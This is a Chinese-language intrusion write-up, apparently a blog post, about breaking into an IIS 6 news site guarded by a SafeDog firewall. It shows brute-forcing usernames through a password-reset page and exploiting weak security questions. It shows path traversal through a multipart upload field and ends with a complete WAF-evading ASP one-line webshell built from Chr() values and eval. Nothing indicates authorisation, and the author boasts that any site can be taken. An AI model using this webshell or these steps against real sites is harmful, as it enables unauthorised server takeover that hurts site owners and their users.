0x01 信息收集

服务器信息： windows 2003 + IIS 6.0 + aspx . Php + 安全狗

站点cms信息：一套aspx新闻发布系统 和 Discuz X3

端口信息 ： 服务器好像有拦截了, 探测不了 暂时先不看了 找下突破点。

0x02 寻找突破点

先明确下思路, 主站  – DZ论坛弱口令 getshell – 旁站 – 社工 – C段嗅探

先从主站 找下突破点 , 发布新闻 肯定会有上传点的 习惯性的扫一下。

没扫出什么东西 懒得放 WVS appcan 去扫了，手工找下敏感信息吧。

后台登录：http://www.xxoo.com/System/Login.aspx

会员中心：http://www.xxoo.com/user/login.aspx

有两处登陆的地方 后台弱口令 万能密码无果

去看一下会员中心 有个注册会员 好像是删除了，打不开

0x03 忘记密码找回突破

思路就快中断时候，灵光一闪 ，不是有个忘记密码么

注册不了 我们就来找回一个用户呗  说干就干

的确有admin 这个用户 试各种答案 都无果..

又蛋疼了.. 先静下心想想思路……………………………………………..

会员中心 会员中心 不就是有很多会员的么  不止一个用户 肯定有别的用户

设置一些傻瓜化问题！

打开 Burpsuite 爆破几个用户名来试试。

成功爆破到一个 用户 试试他的问题吧，

还真是傻瓜化问题 , 答案 就是问题 。 得到一个随机密码 登录之~

0x04 突破上传拿webshell

进到会员中心 发布新闻 找到这个上传点原本以为是Fckeditor 编辑器 可以秒杀 。

但是他用的不是原本的那个上传，这个上传点 什么东西都上传不了…

然后到处找啊找,,

还好找到一个可以上传的地方 附件上传  有上传就行~~上神器burp 截断试试。

本以为改成aspx 可以直接秒杀 ,, 但是404了.. 好吧 仔细看一下上传验证

—————————–7def81f240104

Content-Disposition: form-data; name="File_PicPath"

news|0

—————————–7def81f240104

File_PicPath 参数 应该可以改 news 是新闻的意思吧

应该是上传到指定上传新闻图片附件的目录~

我们把他改为 ../ 上一级目录试试。

的确是 打开试试

跳到上一级目录 秒杀之~  开开心心上传一句话~~

0x05 没遇到过的安全狗

上传菜刀本身的一句话,,没想到被安全狗拦截了 不过这个狗 第一次遇到。。

这种安全狗没遇到过… 不过找个中文一句话秒杀之~~

附上中文一句话：

<%

i=(Chr(-12590))

love=(Chr(-20306))

you=(Chr(-15133))

OK=i&love&you

CNM=Request(OK)

eVal CNM 'pass:我爱你

%>

密码：我爱你

本次渗透到此结束了,提权没空去提, 学生党伤不起 思路要淫荡 头脑要明确 ！

总结一句话：不管你有什么拦截 只要你思路淫荡 没有你日不到的站。